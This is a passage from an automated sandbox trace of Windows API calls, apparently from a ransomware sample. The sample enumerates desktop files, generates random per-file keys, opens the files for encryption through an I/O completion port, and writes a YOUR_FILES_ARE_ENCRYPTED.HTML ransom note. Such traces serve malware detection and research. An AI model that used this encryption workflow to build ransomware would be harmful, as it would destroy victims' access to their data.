param_1=0x4ebda3e, param_2="%02X" | out: param_1="FF") returned 2 [0166.013] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="76") returned 2 [0166.013] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="7D") returned 2 [0166.013] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="FE") returned 2 [0166.013] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="58") returned 2 [0166.013] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="41") returned 2 [0166.013] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="3D") returned 2 [0166.013] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="B1") returned 2 [0166.013] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="74") returned 2 [0166.014] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="D2") returned 2 [0166.014] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="02") returned 2 [0166.014] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="FF") returned 2 [0166.014] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="6F") returned 2 [0166.014] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="C0") returned 2 [0166.014] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="89") returned 2 [0166.014] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="9F") returned 2 [0166.014] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="53") returned 2 [0166.014] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="FA") returned 2 [0166.014] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="85") returned 2 [0166.014] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="44") returned 2 [0166.014] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="7A") returned 2 [0166.014] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="FF") returned 2 
[0166.014] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="12") returned 2 [0166.014] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="B5") returned 2 [0166.014] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="6E") returned 2 [0166.014] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="8F") returned 2 [0166.014] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="5A") returned 2 [0166.014] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="AD") returned 2 [0166.014] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="4E") returned 2 [0166.014] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="79") returned 2 [0166.015] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\SaH.png" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\SaH.png") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\SaH.png" [0166.015] CreateIoCompletionPort (FileHandle=0x5b0, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.015] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.030] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbad310f0, ftCreationTime.dwHighDateTime=0x1d7d8af, ftLastAccessTime.dwLowDateTime=0xe2c47650, ftLastAccessTime.dwHighDateTime=0x1d7e3de, ftLastWriteTime.dwLowDateTime=0xe2c47650, ftLastWriteTime.dwHighDateTime=0x1d7e3de, nFileSizeHigh=0x0, nFileSizeLow=0x204f, dwReserved0=0xff3db2bb, dwReserved1=0xffffffff, cFileName="siEyKMkaJ2X9IA-.jpg", cAlternateFileName="SIEYKM~1.JPG")) returned 1 [0166.030] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\siEyKMkaJ2X9IA-.jpg") returned 59 [0166.030] lstrcmpW (lpString1="siEyKMkaJ2X9IA-.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.030] PathFindExtensionW (pszPath="siEyKMkaJ2X9IA-.jpg") returned=".jpg" [0166.030] lstrlenW (lpString=".jpg") returned 4 [0166.030] PathFindExtensionW (pszPath="siEyKMkaJ2X9IA-.jpg") returned=".jpg" [0166.030] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0166.030] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\siEyKMkaJ2X9IA-.jpg" (normalized: "c:\\users\\5alr3u30d3\\desktop\\ccay71x\\sieykmkaj2x9ia-.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b0 [0166.031] GetFileSizeEx (in: hFile=0x5b0, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=8271) returned 1 [0166.031] GetProcessHeap () returned 0x270000 [0166.031] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.034] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="DA") returned 2 [0166.034] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="5A") returned 2 [0166.035] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="F7") returned 2 [0166.035] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="C6") returned 2 [0166.035] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="64") returned 2 [0166.035] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="AF") returned 2 [0166.035] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="82") returned 2 [0166.035] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="93") returned 2 [0166.035] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="EC") returned 2 [0166.035] wsprintfW (in: param_1=0x4ebda5a, 
param_2="%02X" | out: param_1="ED") returned 2 [0166.035] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="6B") returned 2 [0166.035] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="28") returned 2 [0166.035] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="3C") returned 2 [0166.035] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="31") returned 2 [0166.035] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="B8") returned 2 [0166.035] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="CB") returned 2 [0166.035] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="D1") returned 2 [0166.035] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="66") returned 2 [0166.035] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="27") returned 2 [0166.035] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="73") returned 2 [0166.035] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="46") returned 2 [0166.035] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="30") returned 2 [0166.035] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="91") returned 2 [0166.035] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="7C") returned 2 [0166.035] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="9F") returned 2 [0166.035] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="4E") returned 2 [0166.035] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="C4") returned 2 [0166.035] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="9A") returned 2 [0166.035] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="19") returned 2 [0166.035] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="34") returned 2 [0166.035] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="75") returned 2 [0166.035] wsprintfW 
(in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="17") returned 2 [0166.036] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\siEyKMkaJ2X9IA-.jpg" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\siEyKMkaJ2X9IA-.jpg") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\siEyKMkaJ2X9IA-.jpg" [0166.036] CreateIoCompletionPort (FileHandle=0x5b0, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.036] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.044] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9538dd0, ftCreationTime.dwHighDateTime=0x1d7e144, ftLastAccessTime.dwLowDateTime=0x7ec02a0, ftLastAccessTime.dwHighDateTime=0x1d7e1ef, ftLastWriteTime.dwLowDateTime=0x7ec02a0, ftLastWriteTime.dwHighDateTime=0x1d7e1ef, nFileSizeHigh=0x0, nFileSizeLow=0x14cb8, dwReserved0=0xff3db2bb, dwReserved1=0xffffffff, cFileName="zn7l9.xlsx", cAlternateFileName="ZN7L9~1.XLS")) returned 1 [0166.044] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\zn7l9.xlsx") returned 50 [0166.044] lstrcmpW (lpString1="zn7l9.xlsx", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 1 [0166.044] PathFindExtensionW (pszPath="zn7l9.xlsx") returned=".xlsx" [0166.045] lstrlenW (lpString=".xlsx") returned 5 [0166.045] PathFindExtensionW (pszPath="zn7l9.xlsx") returned=".xlsx" [0166.045] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0166.045] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\zn7l9.xlsx" (normalized: "c:\\users\\5alr3u30d3\\desktop\\ccay71x\\zn7l9.xlsx"), dwDesiredAccess=0xc0010000, 
dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b0 [0166.045] GetFileSizeEx (in: hFile=0x5b0, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=85176) returned 1 [0166.045] GetProcessHeap () returned 0x270000 [0166.046] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.046] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="8A") returned 2 [0166.046] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="B4") returned 2 [0166.046] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="58") returned 2 [0166.046] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="94") returned 2 [0166.047] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="09") returned 2 [0166.047] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="9C") returned 2 [0166.047] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="DD") returned 2 [0166.047] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="F6") returned 2 [0166.047] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="29") returned 2 [0166.047] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="F5") returned 2 [0166.047] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="85") returned 2 [0166.047] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="1D") returned 2 [0166.047] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="E0") returned 2 [0166.047] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="D4") returned 2 [0166.047] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="40") returned 2 [0166.047] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="5B") returned 2 [0166.047] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="F7") returned 2 [0166.047] wsprintfW (in: param_1=0x4ebda7a, 
param_2="%02X" | out: param_1="A7") returned 2 [0166.047] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="50") returned 2 [0166.047] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="20") returned 2 [0166.047] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="0B") returned 2 [0166.047] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="EF") returned 2 [0166.047] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="C4") returned 2 [0166.047] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="95") returned 2 [0166.047] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="79") returned 2 [0166.047] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="75") returned 2 [0166.047] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="E3") returned 2 [0166.048] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="EF") returned 2 [0166.048] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="6B") returned 2 [0166.048] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="22") returned 2 [0166.048] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="44") returned 2 [0166.048] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="73") returned 2 [0166.048] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\zn7l9.xlsx" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\zn7l9.xlsx") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\zn7l9.xlsx" [0166.048] CreateIoCompletionPort (FileHandle=0x5b0, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.049] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.058] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: 
lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9538dd0, ftCreationTime.dwHighDateTime=0x1d7e144, ftLastAccessTime.dwLowDateTime=0x7ec02a0, ftLastAccessTime.dwHighDateTime=0x1d7e1ef, ftLastWriteTime.dwLowDateTime=0x7ec02a0, ftLastWriteTime.dwHighDateTime=0x1d7e1ef, nFileSizeHigh=0x0, nFileSizeLow=0x14cb8, dwReserved0=0xff3db2bb, dwReserved1=0xffffffff, cFileName="zn7l9.xlsx", cAlternateFileName="ZN7L9~1.XLS")) returned 0 [0166.058] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0166.059] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 69 [0166.059] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\desktop\\ccay71x\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0166.060] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0166.062] CloseHandle (hObject=0x5ac) returned 1 [0166.062] GetProcessHeap () returned 0x270000 [0166.063] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0166.065] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbe324670, ftCreationTime.dwHighDateTime=0x1d7e571, ftLastAccessTime.dwLowDateTime=0xfa1cbf00, ftLastAccessTime.dwHighDateTime=0x1d7e5dd, ftLastWriteTime.dwLowDateTime=0xfa1cbf00, ftLastWriteTime.dwHighDateTime=0x1d7e5dd, nFileSizeHigh=0x0, nFileSizeLow=0xd1cb, dwReserved0=0x0, dwReserved1=0x60, 
cFileName="CZ57sSSL.m4a", cAlternateFileName="")) returned 1 [0166.065] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\CZ57sSSL.m4a") returned 44 [0166.065] lstrcmpW (lpString1="CZ57sSSL.m4a", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.065] PathFindExtensionW (pszPath="CZ57sSSL.m4a") returned=".m4a" [0166.065] lstrlenW (lpString=".m4a") returned 4 [0166.065] PathFindExtensionW (pszPath="CZ57sSSL.m4a") returned=".m4a" [0166.065] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0166.065] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\CZ57sSSL.m4a" (normalized: "c:\\users\\5alr3u30d3\\desktop\\cz57sssl.m4a"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0166.066] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=53707) returned 1 [0166.066] GetProcessHeap () returned 0x270000 [0166.066] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.067] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="61") returned 2 [0166.067] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="98") returned 2 [0166.067] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="D3") returned 2 [0166.067] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="08") returned 2 [0166.067] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="F7") returned 2 [0166.067] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="C3") returned 2 [0166.067] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="83") returned 2 [0166.067] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="76") returned 2 [0166.067] wsprintfW (in: param_1=0x4ebdd62, 
param_2="%02X" | out: param_1="15") returned 2 [0166.067] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="D6") returned 2 [0166.067] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="EC") returned 2 [0166.067] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="B4") returned 2 [0166.067] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="E8") returned 2 [0166.067] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="33") returned 2 [0166.067] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="7D") returned 2 [0166.067] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="B8") returned 2 [0166.067] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="34") returned 2 [0166.067] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="FA") returned 2 [0166.067] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="D0") returned 2 [0166.067] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="C2") returned 2 [0166.067] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="B9") returned 2 [0166.067] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="59") returned 2 [0166.067] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="35") returned 2 [0166.067] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="A6") returned 2 [0166.067] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="B3") returned 2 [0166.068] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="16") returned 2 [0166.068] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="41") returned 2 [0166.068] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="66") returned 2 [0166.068] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="70") returned 2 [0166.068] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="65") returned 2 [0166.068] wsprintfW 
(in: param_1=0x4ebddba, param_2="%02X" | out: param_1="44") returned 2 [0166.068] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="7B") returned 2 [0166.068] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\CZ57sSSL.m4a" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\CZ57sSSL.m4a") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\CZ57sSSL.m4a" [0166.068] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.068] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.083] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xd2428b10, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2428b10, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5b347d0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0166.083] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\desktop.ini") returned 43 [0166.083] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.083] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0166.083] lstrlenW (lpString=".ini") returned 4 [0166.083] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0166.083] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc44768b0, ftCreationTime.dwHighDateTime=0x1d7e2d3, ftLastAccessTime.dwLowDateTime=0x1e2783f0, ftLastAccessTime.dwHighDateTime=0x1d7e64f, 
ftLastWriteTime.dwLowDateTime=0x1e2783f0, ftLastWriteTime.dwHighDateTime=0x1d7e64f, nFileSizeHigh=0x0, nFileSizeLow=0xdeff, dwReserved0=0x0, dwReserved1=0x60, cFileName="fW1l3mfnL9ahH.png", cAlternateFileName="FW1L3M~1.PNG")) returned 1 [0166.083] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\fW1l3mfnL9ahH.png") returned 49 [0166.083] lstrcmpW (lpString1="fW1l3mfnL9ahH.png", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.083] PathFindExtensionW (pszPath="fW1l3mfnL9ahH.png") returned=".png" [0166.083] lstrlenW (lpString=".png") returned 4 [0166.083] PathFindExtensionW (pszPath="fW1l3mfnL9ahH.png") returned=".png" [0166.083] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0166.083] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\fW1l3mfnL9ahH.png" (normalized: "c:\\users\\5alr3u30d3\\desktop\\fw1l3mfnl9ahh.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0166.084] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=57087) returned 1 [0166.084] GetProcessHeap () returned 0x270000 [0166.084] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.087] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="EA") returned 2 [0166.087] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="D5") returned 2 [0166.087] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="5F") returned 2 [0166.087] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="E2") returned 2 [0166.087] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="81") returned 2 [0166.087] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="68") returned 2 [0166.088] wsprintfW (in: 
param_1=0x4ebdd5a, param_2="%02X" | out: param_1="EA") returned 2 [0166.088] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="BC") returned 2 [0166.088] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="3A") returned 2 [0166.088] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="C9") returned 2 [0166.088] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="68") returned 2 [0166.088] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="F5") returned 2 [0166.088] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="E8") returned 2 [0166.088] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="E1") returned 2 [0166.088] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="B1") returned 2 [0166.088] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="55") returned 2 [0166.088] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="51") returned 2 [0166.088] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="00") returned 2 [0166.088] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="B9") returned 2 [0166.088] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="DF") returned 2 [0166.088] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="A3") returned 2 [0166.088] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="17") returned 2 [0166.088] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="4A") returned 2 [0166.088] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="18") returned 2 [0166.088] wsprintfW 